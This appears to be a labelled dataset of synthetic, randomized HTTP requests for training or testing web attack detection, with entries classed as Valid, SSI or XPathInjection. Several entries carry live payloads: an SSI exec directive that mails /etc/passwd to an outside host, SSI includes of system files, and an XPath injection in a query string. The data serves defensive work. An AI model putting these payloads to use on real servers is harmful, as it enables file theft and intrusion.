TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: G1eiwe18ed (r8NYtSU86; s-nn.9sTAi; lUR14.AHUZ; gS@07egJlc; 7VtJx_r)
UA-CPU: MIPS
UA-Disp: 9840,221,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7711x8237
Via: 3.9 www.o35t.jpg, 7.0 8.155.202.161:7595
Transfer-Encoding: compress
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 976 www.eoEas.jpg "rrr4ocEA9Sfs0d" "Tue, 11 Jul 06 23:30:39 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18291
Start - Id: 30788
class: Valid
GET /ZHnnJCeqaccess_logWI.pl?otehNSE=r++n&ystsys=569316&wKgtPJG=rtiotipam7oolntk&eca=g%7E&MjL7MD=58&g9ibxsChde2n=rann&ima=lbbecR&ee9Nslmcygs=eanwtmd&eH5=38&Sss8ea0wbnsett=364990112 HTTP/1.0
Host: 50.52.83.120:80
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: n16gnst-tvy
Cache-Control: no-transform
Client-ip: 187.227.5.130
Cookie: oke=ar;eh12lnbetrveT6U=5790403188;eeeaAlcdNlik=puP8;unionY6PVOTUfnetcat=859;lAoidsmOdo=sGyEYlNoSeo
Cookie2: $Version="4"
Date: Tue, 31 Oct 06 16:28:14 GMT
ETag: "dsNaFYaI9Vqx6VwHcui@"
Expect: vsuo
From: gEod@e1aR.org
If-Modified-Since: Fri, 29 Sep 06 02:51:01 UTC
If-Unmodified-Since: Fri, 12 Feb 10 02:36:25 UTC
If-Match: "cjbnxa-@DJSpkD-K5I-"
If-None-Match: *
If-Range: Wed, 04 Jun 08 20:26:18 UTC
Max-Forwards: 36
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: Basic N2RvdHRuZDplcm90dElycw==
Range: -876878
Referer: http://eq1o.net/tecon8N/daog5oCe/to1he/re6ee5/nbaili.js
TE: gzip
Trailer: Range
User-Agent: e8atclotsd (h9@.XSWY)
UA-CPU: 68000
UA-Disp: 5087,659,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5335x466
Via: HTTP/2.6 95.86.230.249:5683, 8.6 www.s6rt.shtml
Transfer-Encoding: gzip
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 1320262556733301
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30788
Start - Id: 27501
class: Valid
GET /tQdb9MYm1Dhx/exrhd3m4pxAf/Hnki.services_7.1.swf? HTTP/1.1
Host: 21.30.59.15:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 203.13.156.1
Cookie: otzngtm7fpnbN=46;cotioe0tse1pt=r_iRHT;MktMc4xnetcat7_A=hniut;2gpe6I5=7193;aeSodmx2ts0m=ulOEn
Cookie2: $Version="226"
Date: Fri, 08 Feb 08 04:01:16 CET
ETag: W/"tUDmNcX.Xyn7WnSkD"
Expect: Olkhein=cWoa
From: pTaebb@eehra.be
If-Modified-Since: Tue, 03 Nov 09 17:33:27 GMT
If-Unmodified-Since: Sun, 10 Sep 06 17:40:35 UTC
If-Match: "ChjBk99hCL.5OimUNjcj"
If-None-Match: "ysMwXGoVRo_T-wZ"
If-Range: "PSgDKBEQSAE@cBJO"
Max-Forwards: 0
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic eWVld3BpczpzaDRzaWhvNw==
Authorization: Digest uri=http://wceCo.de/npeIc/rthnrsy/pnttf.pdf
Range: 1237-98,8233-,5148-10
Referer: http://www.dlranh.fr/csd3/5r3nc.tiff
TE: trailers,trailers,gzip;q=0.0
Trailer: Range
User-Agent: rSiVRD http://www.s5kieer.be
UA-CPU: PowerPC
UA-Disp: 436,3999,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5041x3321
Via: FTP/7.3 www.7trP.htm, nuJoit/6.3 180.147.80.104, 9.9 www.osEN3nf.jpg:37
Transfer-Encoding: identity
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 618828001
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27501
Start - Id: 40213
class: SSI
PUT /lz6.rrPBc.tiff? HTTP/1.0
Content-Length: 286
Content-Language: vu,otil2p,edacsvyy
Content-Encoding: deflate
Content-Location: /4hseeba/gq1l.bin
Content-MD5: M3JzYWxlaGwzZHRqaHRpYw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 30 Apr 04 10:14:25 CET
Host: 38.133.156.124
Connection: tiispnc1
Accept: image/gif;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: <!--  #exec     cmd="/bin/mail     rs8aTdo.com  <   /etc/passwd"-->
Accept-Language: aanznle-x;q=0.0, Snaiie-rar;q=0.6
Cache-Control: max-stale
Client-ip: 185.221.47.149
Cookie: Rlrgrht2t=put42tsx9ekoerm;fWWI65==documentgs;i0uo=79989;yxaLUyeL=os7egemgTesoa;igiCod6Lail=iframetmnbjf;esah=wa5euv
Date: Sun, 27 Dec 09 12:25:26 UTC
ETag: "TEHshSIX9GRNELK8.i4P"
Expect: 100-continue
From: bOpacsns@arcyIosx0m.biz
If-Unmodified-Since: Fri, 21 May 04 18:42:30 GMT
If-Range: Wed, 21 May 08 14:25:46 GMT
MIME-Version: 8.1
Pragma: no-cache
Referer: http://hthao2.be/mnhnepx/tiljki/cmhn.bin
TE: gzip;q=0.3,gzip,trailers
User-Agent: lt7@mmn0K http://www.tooemtP4.uk
UA-Disp: 1168,280,8
Via: 0.7 www.lchd2.jpg
Upgrade: hmewb8/8.6
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tonnlhias=sixtrbntgdTg8986&dmt=nlOng8.9Dka&tiiiDmi4oelh=07827233&bhlanenoe9mrye=eaedeucrrinput|rptt&eshk=w&otn8crno=vmommno&xYGTdCOIjocv=mBJ4V&ucijferlktcSii=9374&Ahp5yViframe56eval=l|homer2yxltn:?nevalne0&lrmlaxti6=gnsertnt$J&xmlbetweenAPUK3ym=nsyreyuTurt&lacr5=xtb4mIaxYoelR

End - Id: 40213
Start - Id: 49942
class: XPathInjection
GET /jFpvCpi/rwsWlink3nwlocation@p/iadersinimieeudtron/ree/snaylKoN8nyChubtasm.php?ewSoia3eauEasti=0ltmhwhraente&nyyg=965652&tLsDzInrkviNt=42+++or+++ngaA%2Fosdgee%2Fe33f%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D78%5D+++++or++55514%3D&breZye=awaoaSnEesrd&.PRGoBM=rKMHFeB8&eh=+5&cgjuusnte5=iTqgbJ HTTP/1.0
Host: www.usos3BruR.ch
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1250;q=0.9, euc-jp;q=0.1, isiri-3342, iso-8859-5;q=0.9, hz-gb-2312
Accept-Encoding: deflate, compress, compress, gzip
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 69.149.110.120
Cookie: hogd=Rsssehmrr7reuonb;Eiooasy8aOM=h8lcozton5Noaaemp
Cookie2: $Version="8"
Date: Sun, 30 Dec 07 21:08:56 CET
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: gxo4Nam@arrt3.it
If-Modified-Since: Thu, 07 Jan 10 21:14:00 GMT
If-Unmodified-Since: Tue, 08 Jan 08 08:39:39 CET
If-Match: *
If-None-Match: "1K.6ZCeUdVPHiqE"
If-Range: "wk.hGUFLHYe5QKrP9"
Max-Forwards: 563
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: ettae m6re9i=swtosa
Range: 33-0
Referer: http://5opD.gov/eetts/1alhaoxp.sh
TE: trailers
Trailer: Via
User-Agent: 6aiidto/6.7.5
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Linux
UA-Pixels: 299x2707
Via: HTTP/7.6 144.188.45.39, 1.6 www.He9m6.html, 0.7 167.55.66.57:75
Transfer-Encoding: identity
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49942
Start - Id: 131
class: Valid
GET /msQfLsYEUcw24dk/aCs/e@ubxE/CUbegnmtsteiosm/5OCWXDw/us0Yw2Yaigh2S/3bodyI5group byUexecxp_mailIR/m4/uhdtowd6a/annmoni3uiroloddlohf/eeneeissT66ee7/P0RJReiL.htm? HTTP/1.1
Host: www.G3oa.uk
Connection: close
Accept: audio/x-wav;q=0.4, text/*;q=0.7, audio/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.6
Accept-Language: t4lemi7r-edacdi2;q=0.1, Liedj9It-cooerah;q=0.4, mh2mntur-nfyi, viatcnt-hio
Cache-Control: max-stale
Client-ip: 153.241.90.165
Cookie: iEthteh2todwf=300686224;8ieI==iframehmeh5perlYfextermf;xajemtEid=6868919;c0Oeoendeten=ptiinu>r;h2nao=sSQZC0ZFozPV;ei9z80tSimaosh=ieruaNtimEen
Cookie2: $Version="072"
Date: Thu, 01 Jun 06 10:16:57 CET
ETag: W/"n2u9KNQIM@9S8OOc@"
Expect: Btd4soa=heikty
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Thu, 13 Aug 09 20:06:46 GMT
If-Unmodified-Since: Wed, 24 Mar 04 09:14:49 CET
If-Match: "Uvra_TQf56T.NnfPTW"
If-None-Match: *
If-Range: *
Max-Forwards: 8565
MIME-Version: 6.2
Pragma: hg5kl=AS
Proxy-Authorization: NTLM cm1lbmdlZGxjenVlT3RkbGl1cm5UcG1xbWhzdG8zY2FvY2lzNG9kcGFkdHh0cjQ=
Authorization: Basic ZXVMZW41cjE6ZWYwYWV0
Range: 878739-
Referer: http://www.nraTtjDh.com/avei6iat/rydup.doc
TE: deflate,trailers,trailers
Trailer: Via
User-Agent: eakaophz (nKzdahI; aGwLwoSh; uPKuZ4X; rOXtpE; rlLFfpbN_1)
UA-CPU: x86
UA-Disp: 1257,262,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9197x616
Via: 3.5 247.127.96.216
Transfer-Encoding: ilwtcu; cIrlxi=e0t4
Upgrade: amr/8.9
Warning: 375 www.o7pEa.htm "ehoeenamu" "Fri, 20 Oct 06 02:36:22 UTC"
X-Forwarded-For: 89.149.7.74
X-Serial-Number: 20731177155896988891
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 131
Start - Id: 14883
class: Valid
GET /rIXzWYGw1ho8gX5dGH.asmx?osGwhereGDCTd=esz+0kl%7CtDnnn&ddr=njNlGatt%7Em8&CRoZoEuAxW09=63727220&rscsoSie2yinadh=1770&asasdqg=eHtnYinlsl&0aUp1MXjUHiZK=D&dNehsrpoieuAos=e&9nngsrf=iEIhavingns%25emem&pene8h53rngdH=5693607&uoOnnpee=66&dEmorsTinb4toie=+beqsgot99wgeti%40+Y+hF+ HTTP/1.0
Host: www.ngyi.biz
Connection: yecm0
Accept: audio/basic;q=0.0, audio/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.0, gzip;q=0.9
Accept-Language: bCahn1ct-tlAb5d
Cache-Control: kha6t='dIli'
Client-ip: 201.22.33.211
Cookie: n1gQstDxeema=7163;ostrstiie=1815
Cookie2: $Version="30"
Date: Wed, 23 Apr 08 22:18:12 GMT
ETag: W/"NRcXDLTkcKE6Z82"
Expect: enoagCi7=qyBP;KtiNhee=niirtio
From: lowanht@ceRsaits.it
If-Modified-Since: Mon, 19 Sep 05 17:55:03 GMT
If-Unmodified-Since: Mon, 01 Feb 10 06:34:10 UTC
If-Match: "UFcU1CV7bEZoezP"
If-None-Match: *
If-Range: "jyb4NOArge9AEyWf"
Max-Forwards: 97
MIME-Version: 2.1
Pragma: shdwx1='laawan6'
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: Basic YW9zczp5b2Vs
Range: -43,-61335,692292-223
Referer: /3mTeSn/aNFptuim/hgUu.shtml
TE: trailers
Trailer: Trailer
User-Agent: eetsn5uhe
UA-CPU: 68000
UA-Disp: 5587,0901,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5504x4372
Via: FTP/1.7 www.2eegeh.jpeg
Transfer-Encoding: identity
Upgrade: jsrn/5.3, 8icwp/6.5
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14883
Start - Id: 40459
class: SSI
GET /yaoe8ehnnont/O-PrZwexec/SZz7thKbgsoundv/mJd2x/hrC/y2AzpsB/eSsbpj3I_bIfTxm/st2uEwZWTmP3JVWDks/nUuitcetant3ThO/5olnvtntrytnld/u7rtshfhthalazvdH/t29J0ubLihFIvr.tiff?yeneHsyqTe=rax&8z=3&spTf=%3C%21--++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&oraw2cieoyude4m=wue HTTP/1.1
Host: www.0uwSN7o.uk
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-icelandic;q=0.1, euc-cn;q=0.8, iso-8859-15
Accept-Encoding: deflate, compress;q=0.0, deflate, compress, gzip;q=0.4
Accept-Language: Naeaz-ojclCSqL;q=0.6
Cache-Control: lmsSkb='nont2'
Client-ip: 136.51.172.248
Cookie: Iec=  Ssf;oajt6pEyre=dWgzaaTk6JQX;s3nrr=childaDtdivizolde;kz8 z;brdtayift=670;HAlibd.=35;ldrx2o7F=0
Cookie2: $Version="974"
Date: Thu, 11 May 06 21:20:44 UTC
ETag: "zdp_EIRRq.lwSDtn"
Expect: 100-continue
From: npmo@pBctcq.com
If-Modified-Since: Mon, 04 Dec 06 07:58:31 UTC
If-Unmodified-Since: Mon, 10 Sep 07 06:33:55 CET
If-Match: "hnlprMaR_ECNmuQFDnH"
If-None-Match: *
If-Range: *
Max-Forwards: 5785
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: e2eedr onoii=e7Cgep
Range: 688-12571,5864-06540,0825-1066
Referer: http://www.ntyE.ch/rnteo6.gif
TE: trailers,chunked;q=0.9
Trailer: If-Match
User-Agent: Mozilla/6.1 (compatible; Konqueror/6.9; SunOS sun4u; zLehria)
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 025x185
Via: 8.0 www.fflct.shtml, 3.4 251.66.17.2
Transfer-Encoding: compress
Upgrade: ytiE/1.4
Warning: 218 www.tisoHb.htm "wmoeMido5" "Sun, 29 Feb 04 21:33:45 CET"
X-Forwarded-For: 109.247.28.154
X-Serial-Number: 98565372421828
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40459
Start - Id: 688
class: Valid
GET /wizkcVe/h7dJl/6scn/7whereoptywWHadminQVZ/ouEK2UArUcj/kconnectcAU@/oEQ54AXQ2--oJZFVBk1w.htm? HTTP/1.0
Host: 235.218.62.200:80
Connection: eibeso
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity, deflate
Accept-Language: 8u-i, Dn-lrcD;q=0.1, t0sln-ma;q=0.4, m-l;q=0.3, 5eoMes-eWta9
Cache-Control: no-store
Client-ip: 80.195.233.91
Cookie: hyaOrtffo=aUbRt1eoai88et;YS1bZqN=233029;sStecisjKhrw=4784;othvhs9nt=9;ellEoytl=aptttsu0mrO;h8tthh1ny= euchidd
Cookie2: $Version="042"
Date: Tue, 08 May 07 16:34:06 CET
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Fri, 20 Aug 04 21:30:48 CET
If-Unmodified-Since: Sat, 10 Oct 09 17:36:09 GMT
If-Match: *
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: Thu, 25 Aug 05 06:54:52 UTC
Max-Forwards: 374
MIME-Version: 2.3
Pragma: etw=nnh
Proxy-Authorization: Digest username="hihtp"
Authorization: Basic VG5pNTpyeWJoc3Bl
Range: -7,9185-99305,64-211014
Referer: http://6oaemon.gov/D0adlWaA.gz
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.2 (compatible; ttrnAe; SunOS sun4u; iewkh; uadw; 4ehwoi8)
UA-CPU: x86
UA-Disp: 667,0755,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: FTP/5.3 www.axfe.html, HTTP/1.3 135.232.121.13, 4.0 8.84.88.243:9
Transfer-Encoding: identity
Upgrade: pneie/9.5
Warning: 395 119.100.16.106 "T0trozfto" "Fri, 08 May 09 24:52:53 GMT"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 688
Start - Id: 28170
class: Valid
GET /eyIsQ2lx-KM0kfsSN/2zsoetNhyeouh7neeK/d.fT.QDzRb7/TklxtermZ6zDRNxWz41/riDX_b9/ooag1bsrfeh/sDYaLNvTdyQ0fBQTmtW/sJtop/ude/6itqe/hF9BvfumRXkrBNvd/4D0fx.ifYlNl.php?susfusa=2&9wt=aK%40E&239s_r-DRI=22&naAaeeoar=97&betr=9UOH%40H&XjSdX=%5Cha%3Cs8lSnrs%7EaT&3fAsnvc=pnwiAGYSx&kaiaordbnme=c&rcmdXmJSaudYvar=88587 HTTP/1.1
Host: www.arni.gov:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: windows-1253;q=0.7, euc-jp;q=0.2, euc-jp;q=0.1, iso-8859-9, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 221.141.132.92
Cookie: pef6tuhy=43;arandn=bMO0N
Cookie2: $Version="8"
Date: Wed, 26 Sep 07 11:30:34 GMT
ETag: "U59tojFjAV-FAAAKmM"
Expect: cmGhof4A=ehaaa;godae
From: 5sno9a@sllb.be
If-Modified-Since: Wed, 07 Nov 07 04:02:07 UTC
If-Unmodified-Since: Wed, 09 Jun 04 04:32:19 CET
If-Match: "UFCHs9IwBfG@Sy_b3"
If-None-Match: *
If-Range: "yfSxSDpsTE4F0sjEux"
Max-Forwards: 27
MIME-Version: 1.3
Pragma: Waezltpo='hft'
Proxy-Authorization: Digest realm
Authorization: Basic eW5zdGlpaDphdHNuZXM=
Range: 41-7,-70107,-4601
Referer: http://beih0nw.org/cuemtsg.gif
TE: trailers,trailers
Trailer: Accept
User-Agent: dRnetsss
UA-CPU: Sparc
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 709x9320
Via: 3.9 www.sbgE.shtml, 9.7 www.oEfcfsy.png
Transfer-Encoding: compress
Upgrade: atream/5.4, ueGrn/9.3, 8jitoo/8.1
Warning: 392 www.qhxhGl.png "eSdirkobe" 
X-Forwarded-For: 166.20.66.203
X-Serial-Number: 90040752816
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28170
Start - Id: 40437
class: SSI
POST /QkfuS57Ivar6iframeprocessing-instruction/n.te.QXjT5omV0rvj/7noarsnys/n_tWo/tW6kJSGhYZEPfvlQ.RO/a8reacjeoooAe01.gif? HTTP/1.0
Content-Length: 82
Content-Language: rhN
Content-Encoding: gzip
Content-Location: http://www.a5ettel.org/irxfest/eo3df.html
Content-MD5: dGFkbnd0YXd0ZWpvYTdzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Mar 09 08:24:42 CET
Host: 201.78.176.143
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: no-cache
Cookie: nizfsg2Et=0wtehahCE;hueaayohen9dta=175120;notitd=70083;w3OnSarsdugT=wwtajor;LteaAlttha=6780;u9stnano=a2rJ
Date: Thu, 06 Jul 06 14:20:44 CET
From: npekicti@osnlrlrUFe.cz
If-Modified-Since: Thu, 19 Jan 06 06:21:06 UTC
If-Unmodified-Since: Mon, 04 Oct 04 09:51:31 CET
If-Match: "sAuUM_zGHArRwos"
If-None-Match: "HhHz_SkO_yuZLNjY"
If-Range: "uTygbm9-0WlZGH4Tp"
Max-Forwards: 946
MIME-Version: 1.1
Range: 6-639655,691634-6
Referer: /taant/nerc.avi
TE: trailers,chunked;q=0.6,trailers
User-Agent: Mozilla/3.2 (Windows; U; WinNT 9.2; uu-mI; rv:9.1.3) Gecko/66956059
Via: 9.1 82.208.184.133, FTP/0.1 www.yseah.htm:3281
Transfer-Encoding: deflate
Upgrade: oN9/2.4
Warning: 651 172.235.59.54 "eaErt" 
X-Forwarded-For: 156.175.98.204

H0WrLy=<!-- #include  virtual="d:\windows\autoexec.bat"    -->

End - Id: 40437
Start - Id: 14398
class: Valid
GET /hGTR9gl7fhgUr/tSMQbv/sgIh5/AMgilnueao4/.f9--Z4pJdZao9/gNPi0V8TD9U5HL7dDY.php4?4gnNTtuffk=a5othe9inn HTTP/1.0
Host: 143.90.103.121
Connection: close
Accept: video/mpeg;q=0.3
Accept-Charset: cp-950, iso-8859-3, windows-1251;q=0.4, windows-1250;q=0.2, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 242.114.172.151
Cookie: tol=tBUJZc;hjmqUee5=Lwitttx|utor;myeeanox1h9=Oar2dnd>a'?;cp6viqjgU=opXKDP0-;24naUiUeBKv0=aMGz7e
Cookie2: $Version="325"
Date: Tue, 01 Jan 08 01:01:05 CET
ETag: W/".hk0JKuS95FK1JbPTAD"
Expect: osi9
From: Rt7eei@haruek9a0.st
If-Modified-Since: Fri, 09 Apr 10 20:36:31 CET
If-Unmodified-Since: Tue, 10 Oct 06 14:10:58 CET
If-Match: *
If-None-Match: "jW6hbNQt0xSG7Il."
If-Range: Thu, 08 Jan 09 09:51:11 GMT
Max-Forwards: 434
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: NTLM b29ldXc4aWFkYXcyc0tlWUh5YWVhOG5tb2VvZW95ZWNnMFRuc21lZWZkbXNvbg==
Range: -71089,-74863
Referer: http://lbluae.ch/ifet7una/cNhmis/8rmi5sea.jpg
TE: trailers,deflate,chunked;q=0.6
Trailer: Authorization
User-Agent: nehoekM77/5.3.9.7
UA-CPU: StrongARM
UA-Disp: 437,7819,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: 8.8 www.tiitrnpm.png, mwd4ma/4.7 163.67.43.207
Transfer-Encoding: gzip
Upgrade: swzoit/1.5, jflt/3.5
Warning: 239 www.iiaa.jpg "v1nj0rT7djelun" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14398
Start - Id: 1196
class: Valid
GET /cttCjRr3.ZpG6oOG._/j.26WUK0yQoS./3gSl23JaiPW6ssM/njcNYBnkSEBVBiNx/qunionvW03A/htxnndesdwsmg/1gF/eqeJOYz/6uenlhnprsaoeomwshx/lC@BqBg2homeT7Hh/P05mCldroph_EdhFD/vheTles7nisor.pl?4_Jxg=hB5mlrB&_YSJGQQXN=ar_7tiy&fstpie=vei-toloqi&57saEeDm8=mziahn&-o@fSw2Wxu=r5znjur HTTP/1.0
Host: 124.66.0.130:74
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: rhh='mc'
Client-ip: 88.196.5.169
Cookie: rKSzrz6=srrcpdnNtsgtFd3nyv;2PB4LjRlog=rtowjm 3tbi\ tte-t;derhrw=9;eeFdkspn=440601
Cookie2: $Version="71"
Date: Fri, 23 Feb 07 07:16:14 GMT
ETag: "4G0pm5zalxbPsp_0"
Expect: 100-continue
From: stkJu@ixghnIjuI.org
If-Modified-Since: Mon, 07 Nov 05 19:39:45 GMT
If-Unmodified-Since: Mon, 03 May 10 16:09:21 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Nov 07 07:22:42 GMT
Max-Forwards: 8
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM bjRvYWhzYWxxcmUwc2VhcHNvTzRvYXhoaHQ4NEFhZFRodWVJaWdsZW9zcw==
Authorization: r3lbh rzNc=8aet
Range: 424325-,89-51405
Referer: /gbyi2e/s6igret/ti5hwart.jsp
TE: deflate;q=0.4,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: eB-c7yWIhS http://www.caunih.it
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6451x169
Via: w0uaii/1.5 www.s1otuvl.html, HTTP/6.4 www.nncua.tiff, 4.8 www.idbn27.shtml
Transfer-Encoding: 3tss96
Upgrade: u6r/6.7
Warning: 000 44.117.86.117 "8eny" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 38993311139
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1196
Start - Id: 21058
class: Valid
GET /oetGc1/cN0COWd4AeFgFBIQ/kf82UA/oU6BGB/5storsonfwgsbk.htm?lwmlh=4347126687&YqXGRboot.iniRlu=neir9tia&rezuehu=9182028200&wtryhuIo=jy7G8o7Eyl&mirahossocet=43&Eesttprai4neu2=%5D&9NOyw=servicesteaaslike3r7&tdn1t0dnrcfu=1074 HTTP/1.1
Host: 116.73.186.252
Connection: cbna8se
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: lpkeE=ienaSLi
Client-ip: 226.117.147.113
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="411"
Date: Mon, 19 Feb 07 05:58:23 GMT
ETag: "Qs6u8k3HRelHZUefCZ"
Expect: 100-continue
From: J3sr@MshinO.net
If-Modified-Since: Tue, 29 May 07 13:49:46 UTC
If-Unmodified-Since: Sat, 24 Sep 05 11:41:52 UTC
If-Match: *
If-None-Match: "rbNCvsv90zI1H8vVOyu"
If-Range: *
Max-Forwards: 8
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Basic RElmdGVydHI6emR0c2xvc2E=
Range: 249654-
Referer: http://ttnA.st/gxs1.dll
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.2 (X11; U; Unix 3.1; eY-tR; rv:2.9.9) Gecko/74890802
UA-CPU: 68000
UA-Disp: 856,3044,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 523x776
Via: HTTP/2.7 90.63.195.184:58189, CmiHti/3.1 253.219.127.50
Transfer-Encoding: compress
Upgrade: 7ynff/7.0
Warning: 708 255.125.121.38 "eth4asnh" "Sun, 05 Aug 07 12:56:58 UTC"
X-Forwarded-For: 204.19.242.253
X-Serial-Number: 650978480578430420
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21058
Start - Id: 17996
class: Valid
GET /PXOddin3EhUMo/mh-y2UUF5FQvqzKC/gATkTYbDu8/eT7Vf@n/r9Zs_6/oEc5po7namc5h4j.swf?uwedtMkesh3=7429756&ei=+%3FnullNuowindow.openlddJnrhavingtF&W7Ng2RpCV=2azs0&5av1ahlo8RD=5453&ge=ebnSnflschermrtmpOb2&oetUeknOa=lererh&raehwenotejnd5=i&e6hegdRmluh1ri=537896984&tdlTwiytejl9ts=sT.zQo&I6ddEL=5t%5DrRitwi5a+%7Etdm&apsjapamir=+i&OT@D2=a5rsm2 HTTP/1.0
Host: 0.63.254.214:80
Connection: asdrawrr
Accept: */*
Accept-Charset: euc-cn;q=0.1, iso-8859-8, windows-1254;q=0.7, iso-2022-kr;q=0.9, x-mac-greek;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=69
Client-ip: 253.227.5.211
Cookie: aypFoisshhe=17;arcit=w;2d=76738018;xs=pyiIdn99ttts
Cookie2: $Version="312"
Date: Sat, 20 Jun 09 20:32:54 UTC
ETag: W/"kyTw_ggtU6ddKcyHBMOx"
Expect: 100-continue
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Mon, 01 Oct 07 12:00:57 GMT
If-Unmodified-Since: Fri, 20 Feb 04 17:06:21 CET
If-Match: "x@C9y5sFU1l97rt60"
If-None-Match: *
